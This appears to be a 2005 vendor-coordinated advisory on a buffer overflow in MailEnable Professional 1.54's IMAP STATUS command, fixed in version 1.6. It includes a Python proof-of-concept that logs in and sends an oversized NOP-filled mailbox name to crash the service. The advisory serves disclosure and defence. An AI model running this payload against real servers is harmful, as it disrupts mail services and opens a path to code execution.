MailEnable STATUS Command Buffer OverflowSummary
"MailEnable is a mail server software which provides a messaging platform for Microsoft Windows."
A buffer overflow in the MailEnable's STATUS command support allows attackers to execute arbitrary code with elevated privileges.
Credit:
The information has been provided by Core Security Technologies .
The original article can be found at: http://www.coresecurity.com/common/showdoc.php?idx=467&idxseccion=10
Details
Vulnerable Systems:
* MailEnable Professional edition version 1.54
Immune Systems:
* MailEnable Professional edition version 1.6
MailEnable's support for IMAP status command can be exploited to cause the product to overflow an internal buffer, the following exploit code will overflow the buffer with a NOP sled.
Proof of Concept:
#
# POC about imapd mailenable bug in status command
#
import sys
import imaplib
class poc:
def __init__(self,host,loginimap,passimap):
self.host=host
self.loginimap=loginimap
self.passimap=passimap
def exploit(self):
print "Please wait"
connect = imaplib.IMAP4(self.host)
connect.login(self.loginimap,self.passimap)
nops='\x00'
nops+='\x90'*10540
try:
typ, data = connect.status(nops,'(UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)')
except Exception,e:
print "Service down!"
return 0
if(len(sys.argv) < 4):
print "Need 3 arguments, ./poc.py host user pass"
sys.exit(1)
exp=poc(sys.argv[1],sys.argv[2],sys.argv[3])
exp.exploit()
#EoF
Disclosure Timeline:
2005-06-30: Notification to vendor.
2005-06-30: Vendor acknowledged notification and provided a fix.
2005-07-12: Public Disclosure.